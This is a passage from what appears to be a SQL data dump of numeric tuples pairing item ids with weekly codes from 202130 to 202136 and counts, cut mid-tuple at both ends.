7),(1747,1,'202130',7),(1751,1,'202130',7),(1772,1,'202130',7),(2154,1,'202130',7),(2156,1,'202130',7),(2161,1,'202130',7),(2804,1,'202130',7),(2993,1,'202130',7),(3027,1,'202130',7),(3045,1,'202130',7),(3096,1,'202130',7),(3102,1,'202130',7),(3243,1,'202130',7),(3273,1,'202130',7),(3278,1,'202130',7),(1697,1,'202130',8),(1720,1,'202130',8),(1724,1,'202130',8),(1728,1,'202130',8),(1768,1,'202130',8),(1774,1,'202130',8),(2063,1,'202130',8),(2165,1,'202130',8),(2809,1,'202130',8),(2964,1,'202130',8),(3023,1,'202130',8),(3097,1,'202130',8),(3109,1,'202130',8),(3313,1,'202130',8),(3724,1,'202130',8),(3738,1,'202130',8),(3742,1,'202130',8),(3746,1,'202130',8),(3771,1,'202130',8),(481,1,'202130',9),(485,1,'202130',9),(487,1,'202130',9),(1544,1,'202130',9),(1699,1,'202130',9),(1703,1,'202130',9),(1707,1,'202130',9),(1730,1,'202130',9),(1776,1,'202130',9),(2248,1,'202130',9),(2297,1,'202130',9),(2704,1,'202130',9),(2801,1,'202130',9),(3005,1,'202130',9),(3034,1,'202130',9),(3104,1,'202130',9),(3714,1,'202130',9),(3731,1,'202130',9),(474,1,'202130',10),(570,1,'202130',10),(1695,1,'202130',10),(1713,1,'202130',10),(1722,1,'202130',10),(1778,1,'202130',10),(2911,1,'202130',10),(2965,1,'202130',10),(3004,1,'202130',10),(3226,1,'202130',10),(3290,1,'202130',10),(3438,1,'202130',10),(3498,1,'202130',10),(3777,1,'202130',10),(484,1,'202130',11),(1584,1,'202130',11),(1612,1,'202130',11),(1709,1,'202130',11),(1734,1,'202130',11),(2150,1,'202130',11),(2617,1,'202130',11),(2775,1,'202130',11),(3083,1,'202130',11),(3127,1,'202130',11),(3280,1,'202130',11),(468,1,'202130',12),(1726,1,'202130',12),(2989,1,'202130',12),(3531,1,'202130',12),(3774,1,'202130',12),(470,1,'202130',13),(473,1,'202130',13),(1610,1,'202130',13),(1766,1,'202130',13),(1770,1,'202130',13),(2159,1,'202130',13),(2558,1,'202130',13),(2658,1,'202130',13),(3251,1,'202130',13),(469,1,'202130',14),(1592,1,'202130',14),(1701,1,'202130',14),(1718,1,'202130',14),(3030,1,'202130',14),(3489,1,'202130',14),(74,1,'202130',15),(472,1,'202130',15),(1604,1,'202130',15),(1614,1,'202130',15),(2609,1,'202130',15),(2813,1,'202130',15),(3534,1,'202130',15),(3710,1,'202130',15),(3781,1,'202130',15),(84,1,'202130',16),(1608,1,'202130',16),(2148,1,'202130',17),(2751,1,'202130',17),(2769,1,'202130',17),(3060,1,'202130',17),(3069,1,'202130',17),(72,1,'202130',18),(335,1,'202130',18),(3285,1,'202130',18),(3307,1,'202130',18),(1598,1,'202130',19),(3541,1,'202130',19),(87,1,'202130',20),(1582,1,'202130',20),(3287,1,'202130',20),(108,1,'202130',21),(2904,1,'202130',21),(1606,1,'202130',23),(2457,1,'202130',23),(3282,1,'202130',23),(2309,1,'202130',24),(76,1,'202130',25),(1596,1,'202130',25),(68,1,'202130',26),(2503,1,'202130',27),(3764,1,'202130',27),(1600,1,'202130',29),(1594,1,'202130',32),(1586,1,'202130',33),(1588,1,'202130',35),(91,1,'202130',37),(89,1,'202130',42),(1602,1,'202130',52),(80,1,'202130',58),(9,1,'202130',516),(106,1,'202131',1),(481,1,'202131',2),(3229,1,'202131',2),(3257,1,'202131',2),(3498,1,'202131',2),(110,1,'202131',3),(485,1,'202131',3),(2965,1,'202131',3),(3083,1,'202131',3),(3269,1,'202131',3),(3290,1,'202131',3),(3313,1,'202131',3),(3430,1,'202131',3),(3482,1,'202131',3),(3721,1,'202131',3),(3738,1,'202131',3),(478,1,'202131',4),(1709,1,'202131',4),(2964,1,'202131',4),(2991,1,'202131',4),(3004,1,'202131',4),(3027,1,'202131',4),(3041,1,'202131',4),(3117,1,'202131',4),(3124,1,'202131',4),(3259,1,'202131',4),(3275,1,'202131',4),(3316,1,'202131',4),(3438,1,'202131',4),(3489,1,'202131',4),(3727,1,'202131',4),(102,1,'202131',5),(471,1,'202131',5),(476,1,'202131',5),(482,1,'202131',5),(483,1,'202131',5),(488,1,'202131',5),(1584,1,'202131',5),(1590,1,'202131',5),(1713,1,'202131',5),(1720,1,'202131',5),(1726,1,'202131',5),(1737,1,'202131',5),(1745,1,'202131',5),(2063,1,'202131',5),(2178,1,'202131',5),(2748,1,'202131',5),(2804,1,'202131',5),(3006,1,'202131',5),(3087,1,'202131',5),(3097,1,'202131',5),(3240,1,'202131',5),(3265,1,'202131',5),(3271,1,'202131',5),(3273,1,'202131',5),(3742,1,'202131',5),(1695,1,'202131',6),(1699,1,'202131',6),(1705,1,'202131',6),(1730,1,'202131',6),(1732,1,'202131',6),(1772,1,'202131',6),(1782,1,'202131',6),(2148,1,'202131',6),(2150,1,'202131',6),(2156,1,'202131',6),(2165,1,'202131',6),(2293,1,'202131',6),(2296,1,'202131',6),(2751,1,'202131',6),(2775,1,'202131',6),(2956,1,'202131',6),(2993,1,'202131',6),(3023,1,'202131',6),(3063,1,'202131',6),(3090,1,'202131',6),(3109,1,'202131',6),(3127,1,'202131',6),(3243,1,'202131',6),(3249,1,'202131',6),(3253,1,'202131',6),(3297,1,'202131',6),(3486,1,'202131',6),(3534,1,'202131',6),(3735,1,'202131',6),(3746,1,'202131',6),(480,1,'202131',7),(484,1,'202131',7),(486,1,'202131',7),(1697,1,'202131',7),(1715,1,'202131',7),(1718,1,'202131',7),(1734,1,'202131',7),(1739,1,'202131',7),(1751,1,'202131',7),(1770,1,'202131',7),(2152,1,'202131',7),(2154,1,'202131',7),(2617,1,'202131',7),(2801,1,'202131',7),(2911,1,'202131',7),(3034,1,'202131',7),(3096,1,'202131',7),(3104,1,'202131',7),(3247,1,'202131',7),(3280,1,'202131',7),(3479,1,'202131',7),(467,1,'202131',8),(469,1,'202131',8),(479,1,'202131',8),(1701,1,'202131',8),(1703,1,'202131',8),(1711,1,'202131',8),(1743,1,'202131',8),(1768,1,'202131',8),(2248,1,'202131',8),(2558,1,'202131',8),(3038,1,'202131',8),(3079,1,'202131',8),(3107,1,'202131',8),(3251,1,'202131',8),(3267,1,'202131',8),(3278,1,'202131',8),(3724,1,'202131',8),(3731,1,'202131',8),(3749,1,'202131',8),(477,1,'202131',9),(1612,1,'202131',9),(1741,1,'202131',9),(1747,1,'202131',9),(1749,1,'202131',9),(1774,1,'202131',9),(1778,1,'202131',9),(1780,1,'202131',9),(2704,1,'202131',9),(2769,1,'202131',9),(2989,1,'202131',9),(3005,1,'202131',9),(3045,1,'202131',9),(3060,1,'202131',9),(3066,1,'202131',9),(3092,1,'202131',9),(3261,1,'202131',9),(3263,1,'202131',9),(3307,1,'202131',9),(3710,1,'202131',9),(1544,1,'202131',10),(1596,1,'202131',10),(1610,1,'202131',10),(1728,1,'202131',10),(1766,1,'202131',10),(2161,1,'202131',10),(2252,1,'202131',10),(2813,1,'202131',10),(3072,1,'202131',10),(3102,1,'202131',10),(3714,1,'202131',10),(3752,1,'202131',10),(468,1,'202131',11),(472,1,'202131',11),(474,1,'202131',11),(1722,1,'202131',11),(2457,1,'202131',11),(2658,1,'202131',11),(3245,1,'202131',11),(3282,1,'202131',11),(3285,1,'202131',11),(3531,1,'202131',11),(3774,1,'202131',11),(1608,1,'202131',12),(1707,1,'202131',12),(3287,1,'202131',12),(3771,1,'202131',12),(335,1,'202131',13),(473,1,'202131',13),(2297,1,'202131',13),(2609,1,'202131',13),(3226,1,'202131',13),(3541,1,'202131',13),(108,1,'202131',14),(470,1,'202131',14),(1614,1,'202131',14),(1724,1,'202131',14),(1776,1,'202131',14),(2809,1,'202131',14),(3777,1,'202131',14),(87,1,'202131',15),(487,1,'202131',16),(1592,1,'202131',16),(2904,1,'202131',16),(72,1,'202131',17),(74,1,'202131',17),(84,1,'202131',17),(76,1,'202131',18),(1588,1,'202131',18),(3069,1,'202131',18),(570,1,'202131',19),(2159,1,'202131',19),(3030,1,'202131',20),(1606,1,'202131',22),(1594,1,'202131',23),(1600,1,'202131',23),(2503,1,'202131',23),(1582,1,'202131',24),(1604,1,'202131',24),(68,1,'202131',26),(2309,1,'202131',26),(91,1,'202131',34),(1598,1,'202131',34),(1586,1,'202131',39),(89,1,'202131',42),(80,1,'202131',47),(1602,1,'202131',65),(3781,1,'202131',262),(9,1,'202131',525),(3764,1,'202131',769),(2154,1,'202132',1),(2801,1,'202132',1),(2964,1,'202132',1),(3247,1,'202132',1),(3489,1,'202132',1),(1715,1,'202132',2),(1730,1,'202132',2),(1776,1,'202132',2),(2063,1,'202132',2),(2152,1,'202132',2),(2156,1,'202132',2),(2165,1,'202132',2),(2748,1,'202132',2),(2775,1,'202132',2),(3006,1,'202132',2),(3257,1,'202132',2),(3263,1,'202132',2),(3267,1,'202132',2),(3316,1,'202132',2),(3724,1,'202132',2),(102,1,'202132',3),(477,1,'202132',3),(478,1,'202132',3),(479,1,'202132',3),(483,1,'202132',3),(1584,1,'202132',3),(1703,1,'202132',3),(1707,1,'202132',3),(1709,1,'202132',3),(1713,1,'202132',3),(1739,1,'202132',3),(1768,1,'202132',3),(1772,1,'202132',3),(1778,1,'202132',3),(2148,1,'202132',3),(2161,1,'202132',3),(2965,1,'202132',3),(3004,1,'202132',3),(3072,1,'202132',3),(3090,1,'202132',3),(3124,1,'202132',3),(3249,1,'202132',3),(3269,1,'202132',3),(3273,1,'202132',3),(3275,1,'202132',3),(3297,1,'202132',3),(3430,1,'202132',3),(3438,1,'202132',3),(3727,1,'202132',3),(3731,1,'202132',3),(3738,1,'202132',3),(3746,1,'202132',3),(476,1,'202132',4),(1701,1,'202132',4),(1705,1,'202132',4),(1711,1,'202132',4),(1726,1,'202132',4),(1782,1,'202132',4),(2150,1,'202132',4),(2558,1,'202132',4),(2617,1,'202132',4),(2991,1,'202132',4),(3023,1,'202132',4),(3087,1,'202132',4),(3092,1,'202132',4),(3107,1,'202132',4),(3117,1,'202132',4),(3251,1,'202132',4),(3265,1,'202132',4),(3290,1,'202132',4),(3313,1,'202132',4),(3479,1,'202132',4),(3721,1,'202132',4),(3735,1,'202132',4),(467,1,'202132',5),(469,1,'202132',5),(480,1,'202132',5),(481,1,'202132',5),(482,1,'202132',5),(1590,1,'202132',5),(1697,1,'202132',5),(1699,1,'202132',5),(1734,1,'202132',5),(1751,1,'202132',5),(1766,1,'202132',5),(1780,1,'202132',5),(2178,1,'202132',5),(2911,1,'202132',5),(3041,1,'202132',5),(3063,1,'202132',5),(3066,1,'202132',5),(3096,1,'202132',5),(3240,1,'202132',5),(3243,1,'202132',5),(3245,1,'202132',5),(3261,1,'202132',5),(3278,1,'202132',5),(3280,1,'202132',5),(3531,1,'202132',5),(3710,1,'202132',5),(3749,1,'202132',5),(3752,1,'202132',5),(484,1,'202132',6),(485,1,'202132',6),(486,1,'202132',6),(1695,1,'202132',6),(1722,1,'202132',6),(1732,1,'202132',6),(1743,1,'202132',6),(1745,1,'202132',6),(1747,1,'202132',6),(1749,1,'202132',6),(1770,1,'202132',6),(1774,1,'202132',6),(2248,1,'202132',6),(2804,1,'202132',6),(3005,1,'202132',6),(3097,1,'202132',6),(3104,1,'202132',6),(3226,1,'202132',6),(3229,1,'202132',6),(3253,1,'202132',6),(3259,1,'202132',6),(3271,1,'202132',6),(3498,1,'202132',6),(473,1,'202132',7),(1608,1,'202132',7),(1737,1,'202132',7),(2252,1,'202132',7),(2609,1,'202132',7),(2751,1,'202132',7),(2993,1,'202132',7),(3027,1,'202132',7),(3034,1,'202132',7),(3083,1,'202132',7),(3102,1,'202132',7),(3109,1,'202132',7),(3127,1,'202132',7),(471,1,'202132',8),(487,1,'202132',8),(488,1,'202132',8),(1610,1,'202132',8),(1741,1,'202132',8),(3038,1,'202132',8),(3482,1,'202132',8),(3486,1,'202132',8),(3742,1,'202132',8),(470,1,'202132',9),(472,1,'202132',9),(474,1,'202132',9),(570,1,'202132',9),(1544,1,'202132',9),(1614,1,'202132',9),(1718,1,'202132',9),(2293,1,'202132',9),(2297,1,'202132',9),(2704,1,'202132',9),(3079,1,'202132',9),(3307,1,'202132',9),(3534,1,'202132',9),(3714,1,'202132',9),(1720,1,'202132',10),(2658,1,'202132',10),(2769,1,'202132',10),(2989,1,'202132',10),(1728,1,'202132',11),(2296,1,'202132',11),(2809,1,'202132',11),(468,1,'202132',12),(1594,1,'202132',12),(1612,1,'202132',12),(1724,1,'202132',12),(2956,1,'202132',12),(3045,1,'202132',12),(3060,1,'202132',12),(3774,1,'202132',12),(1596,1,'202132',13),(2457,1,'202132',13),(2813,1,'202132',13),(3030,1,'202132',13),(108,1,'202132',14),(335,1,'202132',14),(1592,1,'202132',14),(74,1,'202132',15),(3069,1,'202132',15),(72,1,'202132',16),(3771,1,'202132',16),(3282,1,'202132',17),(3287,1,'202132',17),(3541,1,'202132',17),(1606,1,'202132',18),(2159,1,'202132',18),(3285,1,'202132',18),(1604,1,'202132',19),(2309,1,'202132',19),(3777,1,'202132',19),(84,1,'202132',20),(1588,1,'202132',20),(2503,1,'202132',20),(2904,1,'202132',20),(76,1,'202132',23),(1600,1,'202132',23),(1586,1,'202132',24),(89,1,'202132',25),(87,1,'202132',27),(1582,1,'202132',27),(68,1,'202132',30),(1598,1,'202132',31),(91,1,'202132',36),(1602,1,'202132',66),(80,1,'202132',89),(3764,1,'202132',206),(9,1,'202132',496),(3781,1,'202132',729),(106,1,'202133',1),(110,1,'202133',1),(3297,1,'202133',1),(3313,1,'202133',1),(3534,1,'202133',1),(3721,1,'202133',1),(486,1,'202133',2),(1734,1,'202133',2),(1749,1,'202133',2),(2154,1,'202133',2),(2252,1,'202133',2),(2293,1,'202133',2),(2558,1,'202133',2),(2804,1,'202133',2),(3066,1,'202133',2),(3090,1,'202133',2),(3229,1,'202133',2),(3316,1,'202133',2),(3727,1,'202133',2),(3731,1,'202133',2),(471,1,'202133',3),(480,1,'202133',3),(481,1,'202133',3),(482,1,'202133',3),(1699,1,'202133',3),(1747,1,'202133',3),(1751,1,'202133',3),(1782,1,'202133',3),(2775,1,'202133',3),(3038,1,'202133',3),(3079,1,'202133',3),(3092,1,'202133',3),(3127,1,'202133',3),(3240,1,'202133',3),(3243,1,'202133',3),(3257,1,'202133',3),(3259,1,'202133',3),(3267,1,'202133',3),(3269,1,'202133',3),(3438,1,'202133',3),(3479,1,'202133',3),(3482,1,'202133',3),(3486,1,'202133',3),(3489,1,'202133',3),(3714,1,'202133',3),(3724,1,'202133',3),(3738,1,'202133',3),(102,1,'202133',4),(473,1,'202133',4),(476,1,'202133',4),(479,1,'202133',4),(487,1,'202133',4),(488,1,'202133',4),(1701,1,'202133',4),(1703,1,'202133',4),(1705,1,'202133',4),(1720,1,'202133',4),(1722,1,'202133',4),(1724,1,'202133',4),(1726,1,'202133',4),(1737,1,'202133',4),(1739,1,'202133',4),(1743,1,'202133',4),(1766,1,'202133',4),(1768,1,'202133',4),(1770,1,'202133',4),(1776,1,'202133',4),(1778,1,'202133',4),(1780,1,'202133',4),(2063,1,'202133',4),(2150,1,'202133',4),(2609,1,'202133',4),(2617,1,'202133',4),(2748,1,'202133',4),(2801,1,'202133',4),(2956,1,'202133',4),(2964,1,'202133',4),(2991,1,'202133',4),(2993,1,'202133',4),(3027,1,'202133',4),(3034,1,'202133',4),(3087,1,'202133',4),(3096,1,'202133',4),(3097,1,'202133',4),(3104,1,'202133',4),(3107,1,'202133',4),(3109,1,'202133',4),(3249,1,'202133',4),(3261,1,'202133',4),(3263,1,'202133',4),(3275,1,'202133',4),(3498,1,'202133',4),(3531,1,'202133',4),(3752,1,'202133',4),(470,1,'202133',5),(477,1,'202133',5),(485,1,'202133',5),(570,1,'202133',5),(1697,1,'202133',5),(1711,1,'202133',5),(1713,1,'202133',5),(1730,1,'202133',5),(1732,1,'202133',5),(2159,1,'202133',5),(2178,1,'202133',5),(2297,1,'202133',5),(2658,1,'202133',5),(2809,1,'202133',5),(2965,1,'202133',5),(3004,1,'202133',5),(3006,1,'202133',5),(3041,1,'202133',5),(3063,1,'202133',5),(3253,1,'202133',5),(3265,1,'202133',5),(3273,1,'202133',5),(3280,1,'202133',5),(3285,1,'202133',5),(3710,1,'202133',5),(3735,1,'202133',5),(3749,1,'202133',5),(74,1,'202133',6),(483,1,'202133',6),(1707,1,'202133',6),(1709,1,'202133',6),(1715,1,'202133',6),(1741,1,'202133',6),(1745,1,'202133',6),(1772,1,'202133',6),(1774,1,'202133',6),(2156,1,'202133',6),(2161,1,'202133',6),(2296,1,'202133',6),(2911,1,'202133',6),(3069,1,'202133',6),(3247,1,'202133',6),(3278,1,'202133',6),(3541,1,'202133',6),(3746,1,'202133',6),(3774,1,'202133',6),(467,1,'202133',7),(484,1,'202133',7),(1590,1,'202133',7),(1608,1,'202133',7),(1610,1,'202133',7),(2165,1,'202133',7),(2751,1,'202133',7),(2989,1,'202133',7),(3124,1,'202133',7),(3226,1,'202133',7),(3245,1,'202133',7),(3271,1,'202133',7),(3282,1,'202133',7),(3430,1,'202133',7),(3742,1,'202133',7),(1592,1,'202133',8),(2248,1,'202133',8),(2769,1,'202133',8),(2813,1,'202133',8),(3060,1,'202133',8),(3102,1,'202133',8),(3117,1,'202133',8),(3287,1,'202133',8),(3771,1,'202133',8),(469,1,'202133',9),(474,1,'202133',9),(478,1,'202133',9),(1584,1,'202133',9),(1588,1,'202133',9),(1596,1,'202133',9),(2148,1,'202133',9),(2152,1,'202133',9),(3023,1,'202133',9),(3307,1,'202133',9),(335,1,'202133',10),(468,1,'202133',10),(1695,1,'202133',10),(2704,1,'202133',10),(3005,1,'202133',10),(3030,1,'202133',10),(3072,1,'202133',10),(3083,1,'202133',10),(3251,1,'202133',10),(3777,1,'202133',10),(108,1,'202133',11),(1612,1,'202133',11),(1728,1,'202133',11),(2457,1,'202133',11),(3045,1,'202133',11),(84,1,'202133',12),(3290,1,'202133',12),(72,1,'202133',13),(472,1,'202133',13),(1544,1,'202133',13),(1604,1,'202133',13),(1718,1,'202133',13),(2503,1,'202133',14),(1614,1,'202133',15),(1582,1,'202133',16),(76,1,'202133',17),(1598,1,'202133',18),(1600,1,'202133',19),(2309,1,'202133',19),(68,1,'202133',20),(87,1,'202133',21),(1606,1,'202133',23),(3764,1,'202133',23),(1594,1,'202133',26),(1586,1,'202133',27),(89,1,'202133',33),(1602,1,'202133',36),(91,1,'202133',40),(80,1,'202133',46),(3781,1,'202133',52),(2904,1,'202133',56),(9,1,'202133',419),(478,1,'202134',1),(1711,1,'202134',1),(2156,1,'202134',1),(3271,1,'202134',1),(3531,1,'202134',1),(1590,1,'202134',2),(1701,1,'202134',2),(1724,1,'202134',2),(1732,1,'202134',2),(1780,1,'202134',2),(2152,1,'202134',2),(2248,1,'202134',2),(2991,1,'202134',2),(2993,1,'202134',2),(3097,1,'202134',2),(3245,1,'202134',2),(3265,1,'202134',2),(3275,1,'202134',2),(3489,1,'202134',2),(3752,1,'202134',2),(481,1,'202134',3),(482,1,'202134',3),(483,1,'202134',3),(1705,1,'202134',3),(1715,1,'202134',3),(1720,1,'202134',3),(1730,1,'202134',3),(1747,1,'202134',3),(1751,1,'202134',3),(1772,1,'202134',3),(2296,1,'202134',3),(2748,1,'202134',3),(2751,1,'202134',3),(3006,1,'202134',3),(3023,1,'202134',3),(3034,1,'202134',3),(3038,1,'202134',3),(3063,1,'202134',3),(3107,1,'202134',3),(3124,1,'202134',3),(3267,1,'202134',3),(3273,1,'202134',3),(3430,1,'202134',3),(3486,1,'202134',3),(3498,1,'202134',3),(3714,1,'202134',3),(3721,1,'202134',3),(3727,1,'202134',3),(3738,1,'202134',3),(471,1,'202134',4),(480,1,'202134',4),(570,1,'202134',4),(1697,1,'202134',4),(1703,1,'202134',4),(1707,1,'202134',4),(1722,1,'202134',4),(1743,1,'202134',4),(1766,1,'202134',4),(2063,1,'202134',4),(2161,1,'202134',4),(2658,1,'202134',4),(2801,1,'202134',4),(2804,1,'202134',4),(3027,1,'202134',4),(3066,1,'202134',4),(3079,1,'202134',4),(3087,1,'202134',4),(3090,1,'202134',4),(3096,1,'202134',4),(3226,1,'202134',4),(3229,1,'202134',4),(3247,1,'202134',4),(3253,1,'202134',4),(3259,1,'202134',4),(3269,1,'202134',4),(3278,1,'202134',4),(3287,1,'202134',4),(3290,1,'202134',4),(3297,1,'202134',4),(3316,1,'202134',4),(3482,1,'202134',4),(3724,1,'202134',4),(3735,1,'202134',4),(3749,1,'202134',4),(102,1,'202134',5),(468,1,'202134',5),(476,1,'202134',5),(479,1,'202134',5),(484,1,'202134',5),(485,1,'202134',5),(1610,1,'202134',5),(1612,1,'202134',5),(1699,1,'202134',5),(1709,1,'202134',5),(1713,1,'202134',5),(1734,1,'202134',5),(1737,1,'202134',5),(1741,1,'202134',5),(1745,1,'202134',5),(1768,1,'202134',5),(1776,1,'202134',5),(2148,1,'202134',5),(2154,1,'202134',5),(2165,1,'202134',5),(2178,1,'202134',5),(2252,1,'202134',5),(2293,1,'202134',5),(2297,1,'202134',5),(2617,1,'202134',5),(2964,1,'202134',5),(2965,1,'202134',5),(3045,1,'202134',5),(3109,1,'202134',5),(3249,1,'202134',5),(3261,1,'202134',5),(3285,1,'202134',5),(3307,1,'202134',5),(3438,1,'202134',5),(3479,1,'202134',5),(3731,1,'202134',5),(3742,1,'202134',5),(3777,1,'202134',5),(74,1,'202134',6),(488,1,'202134',6),(1584,1,'202134',6),(1726,1,'202134',6),(1728,1,'202134',6),(1749,1,'202134',6),(1778,1,'202134',6),(2150,1,'202134',6),(2558,1,'202134',6),(2775,1,'202134',6),(2956,1,'202134',6),(2989,1,'202134',6),(3004,1,'202134',6),(3104,1,'202134',6),(3240,1,'202134',6),(3243,1,'202134',6),(3257,1,'202134',6),(3263,1,'202134',6),(3534,1,'202134',6),(3764,1,'202134',6),(3771,1,'202134',6),(3774,1,'202134',6),(473,1,'202134',7),(486,1,'202134',7),(1608,1,'202134',7),(1695,1,'202134',7),(1739,1,'202134',7),(1782,1,'202134',7),(2809,1,'202134',7),(3092,1,'202134',7),(3280,1,'202134',7),(3282,1,'202134',7),(3313,1,'202134',7),(3541,1,'202134',7),(3746,1,'202134',7),(474,1,'202134',8),(477,1,'202134',8),(1544,1,'202134',8),(1596,1,'202134',8),(2503,1,'202134',8),(3117,1,'202134',8),(1604,1,'202134',9),(2159,1,'202134',9),(2769,1,'202134',9),(3060,1,'202134',9),(3102,1,'202134',9),(335,1,'202134',10),(470,1,'202134',10),(487,1,'202134',10),(1592,1,'202134',10),(1718,1,'202134',10),(1770,1,'202134',10),(2911,1,'202134',10),(3041,1,'202134',10),(3072,1,'202134',10),(3251,1,'202134',10),(467,1,'202134',11),(1600,1,'202134',11),(1774,1,'202134',11),(2813,1,'202134',11),(3710,1,'202134',11),(108,1,'202134',12),(1614,1,'202134',12),(3030,1,'202134',12),(469,1,'202134',13),(1588,1,'202134',13),(3069,1,'202134',13),(84,1,'202134',14),(2704,1,'202134',14),(3127,1,'202134',14),(76,1,'202134',15),(91,1,'202134',15),(2457,1,'202134',15),(2609,1,'202134',15),(87,1,'202134',16),(472,1,'202134',17),(1598,1,'202134',17),(68,1,'202134',18),(1606,1,'202134',18),(3781,1,'202134',18),(72,1,'202134',20),(3083,1,'202134',20),(1582,1,'202134',21),(1594,1,'202134',22),(3005,1,'202134',22),(2309,1,'202134',28),(1586,1,'202134',31),(89,1,'202134',37),(1602,1,'202134',43),(80,1,'202134',49),(2904,1,'202134',159),(9,1,'202134',617),(106,1,'202135',2),(481,1,'202135',2),(1745,1,'202135',2),(3727,1,'202135',2),(480,1,'202135',3),(485,1,'202135',3),(2748,1,'202135',3),(2964,1,'202135',3),(3096,1,'202135',3),(3229,1,'202135',3),(3259,1,'202135',3),(3263,1,'202135',3),(3267,1,'202135',3),(3482,1,'202135',3),(3721,1,'202135',3),(3731,1,'202135',3),(3738,1,'202135',3),(471,1,'202135',4),(477,1,'202135',4),(482,1,'202135',4),(483,1,'202135',4),(486,1,'202135',4),(1703,1,'202135',4),(1709,1,'202135',4),(1720,1,'202135',4),(1739,1,'202135',4),(1749,1,'202135',4),(2165,1,'202135',4),(2989,1,'202135',4),(3066,1,'202135',4),(3072,1,'202135',4),(3097,1,'202135',4),(3104,1,'202135',4),(3124,1,'202135',4),(3261,1,'202135',4),(3269,1,'202135',4),(3271,1,'202135',4),(3280,1,'202135',4),(3285,1,'202135',4),(3297,1,'202135',4),(3316,1,'202135',4),(3479,1,'202135',4),(3486,1,'202135',4),(3489,1,'202135',4),(3498,1,'202135',4),(467,1,'202135',5),(484,1,'202135',5),(487,1,'202135',5),(1584,1,'202135',5),(1699,1,'202135',5),(1705,1,'202135',5),(1715,1,'202135',5),(1726,1,'202135',5),(1743,1,'202135',5),(1768,1,'202135',5),(1776,1,'202135',5),(1778,1,'202135',5),(1780,1,'202135',5),(1782,1,'202135',5),(2063,1,'202135',5),(2152,1,'202135',5),(2161,1,'202135',5),(2293,1,'202135',5),(2617,1,'202135',5),(2658,1,'202135',5),(2769,1,'202135',5),(2809,1,'202135',5),(3005,1,'202135',5),(3006,1,'202135',5),(3041,1,'202135',5),(3063,1,'202135',5),(3079,1,'202135',5),(3109,1,'202135',5),(3240,1,'202135',5),(3243,1,'202135',5),(3247,1,'202135',5),(3249,1,'202135',5),(3257,1,'202135',5),(3265,1,'202135',5),(3438,1,'202135',5),(3534,1,'202135',5),(3541,1,'202135',5),(3724,1,'202135',5),(3749,1,'202135',5),(3752,1,'202135',5),(102,1,'202135',6),(473,1,'202135',6),(476,1,'202135',6),(1590,1,'202135',6),(1695,1,'202135',6),(1697,1,'202135',6),(1707,1,'202135',6),(1722,1,'202135',6),(1730,1,'202135',6),(1734,1,'202135',6),(1737,1,'202135',6),(1741,1,'202135',6),(1751,1,'202135',6),(1772,1,'202135',6),(2150,1,'202135',6),(2558,1,'202135',6),(2609,1,'202135',6),(2991,1,'202135',6),(2993,1,'202135',6),(3027,1,'202135',6),(3034,1,'202135',6),(3087,1,'202135',6),(3090,1,'202135',6),(3092,1,'202135',6),(3273,1,'202135',6),(3278,1,'202135',6),(3282,1,'202135',6),(3290,1,'202135',6),(3313,1,'202135',6),(3531,1,'202135',6),(3735,1,'202135',6),(3746,1,'202135',6),(479,1,'202135',7),(570,1,'202135',7),(1544,1,'202135',7),(1612,1,'202135',7),(1711,1,'202135',7),(1713,1,'202135',7),(1747,1,'202135',7),(1766,1,'202135',7),(1770,1,'202135',7),(2148,1,'202135',7),(2156,1,'202135',7),(2252,1,'202135',7),(2775,1,'202135',7),(3004,1,'202135',7),(3038,1,'202135',7),(3226,1,'202135',7),(3275,1,'202135',7),(3307,1,'202135',7),(3430,1,'202135',7),(3777,1,'202135',7),(74,1,'202135',8),(474,1,'202135',8),(1606,1,'202135',8),(1732,1,'202135',8),(2297,1,'202135',8),(2804,1,'202135',8),(2813,1,'202135',8),(2911,1,'202135',8),(2956,1,'202135',8),(3060,1,'202135',8),(3107,1,'202135',8),(3245,1,'202135',8),(3251,1,'202135',8),(3287,1,'202135',8),(488,1,'202135',9),(1701,1,'202135',9),(1774,1,'202135',9),(2154,1,'202135',9),(2296,1,'202135',9),(2801,1,'202135',9),(3030,1,'202135',9),(3117,1,'202135',9),(3742,1,'202135',9),(3774,1,'202135',9),(335,1,'202135',10),(468,1,'202135',10),(472,1,'202135',10),(478,1,'202135',10),(1610,1,'202135',10),(1724,1,'202135',10),(2457,1,'202135',10),(2751,1,'202135',10),(3023,1,'202135',10),(3045,1,'202135',10),(3102,1,'202135',10),(3127,1,'202135',10),(3710,1,'202135',10),(3714,1,'202135',10),(3771,1,'202135',10),(2178,1,'202135',11),(2248,1,'202135',11),(2704,1,'202135',11),(3069,1,'202135',11),(3253,1,'202135',11),(3764,1,'202135',11),(4275,1,'202135',11),(469,1,'202135',12),(470,1,'202135',12),(1588,1,'202135',12),(1592,1,'202135',12),(1718,1,'202135',12),(1596,1,'202135',13),(1604,1,'202135',13),(1608,1,'202135',13),(1728,1,'202135',13),(2159,1,'202135',13),(2965,1,'202135',13),(108,1,'202135',14),(1594,1,'202135',15),(1598,1,'202135',15),(1600,1,'202135',15),(72,1,'202135',16),(1582,1,'202135',16),(84,1,'202135',17),(1614,1,'202135',17),(2503,1,'202135',17),(3781,1,'202135',17),(2309,1,'202135',19),(91,1,'202135',21),(76,1,'202135',23),(68,1,'202135',25),(87,1,'202135',30),(3083,1,'202135',33),(89,1,'202135',40),(1586,1,'202135',45),(80,1,'202135',58),(1602,1,'202135',72),(2904,1,'202135',148),(9,1,'202135',661),(2156,1,'202136',1),(3253,1,'202136',1),(106,1,'202136',2),(481,1,'202136',2),(482,1,'202136',2),(1743,1,'202136',2),(1749,1,'202136',2),(1751,1,'202136',2),(1776,1,'202136',2),(2658,1,'202136',2),(2748,1,'202136',2),(3063,1,'202136',2),(3265,1,'202136',2),(3273,1,'202136',2),(3531,1,'202136',2),(471,1,'202136',3),(476,1,'202136',3),(1695,1,'202136',3),(1705,1,'202136',3),(1709,1,'202136',3),(1713,1,'202136',3),(1722,1,'202136',3),(1724,1,'202136',3),(1780,1,'202136',3),(2558,1,'202136',3),(2991,1,'202136',3),(3069,1,'202136',3),(3087,1,'202136',3),(3092,1,'202136',3),(3097,1,'202136',3),(3107,1,'202136',3),(3243,1,'202136',3),(3251,1,'202136',3),(3269,1,'202136',3),(3430,1,'202136',3),(3498,1,'202136',3),(3724,1,'202136',3),(3749,1,'202136',3),(4301,1,'202136',3),(479,1,'202136',4),(480,1,'202136',4),(570,1,'202136',4),(1697,1,'202136',4),(1699,1,'202136',4),(1720,1,'202136',4),(1737,1,'202136',4),(1766,1,'202136',4),(1782,1,'202136',4),(2252,1,'202136',4),(2801,1